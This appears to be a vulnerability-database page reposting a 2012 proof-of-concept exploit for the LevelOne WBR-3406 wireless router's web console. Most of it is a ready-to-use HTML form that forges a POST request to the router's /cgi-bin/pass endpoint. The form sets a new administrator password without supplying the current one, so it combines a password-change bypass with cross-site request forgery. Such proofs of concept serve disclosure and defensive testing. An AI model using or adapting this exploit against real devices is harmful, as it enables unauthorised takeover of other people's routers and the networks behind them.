WBR-3406 Password Change Bypass & CSRF Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044079 漏洞类型
发布时间 2013-11-25 更新时间 2013-11-25
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013110171
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# -----------------------------------------------------------
# WBR-3406 Wireless Broadband NAT Router Web-Console Password Change Bypass & CSRF Vulnerability
# This PoC code should do two main things:
# 1. Cross Site Request Forgery (For more information, just google it).
# 2. This code change to new password without know the current password.
# The vulnerability work in a way that if we remove the "PA=" parameter which is the current password
# the application ignore that and change the password without even entering the old / current password.
# Bug discovered by Pr0T3cT10n AKA Yakir Wizman, <yakir.wizman@gmail.com>
# Date 17/08/2012
# Vendor site - http://www.level1.com/
# ISRAEL
# -----------------------------------------------------------
#       Author will be not responsible for any damage.
# -----------------------------------------------------------
# PoC EXPLOIT
# -----------------------------------------------------------
<html>
    <body>
        <form action="http://192.168.123.254/cgi-bin/pass" method="POST">
            <input type="hidden" name="rc" value="@" />
            <input type="hidden" name="Pa" value="1234567" />
            <input type="hidden" name="P1" value="1234567" />
            <input type="hidden" name="rd" value="atbox" />
            <input type="submit" value="Submit form" />
        </form>
    </body>
</html>
  
# ---------------------------------------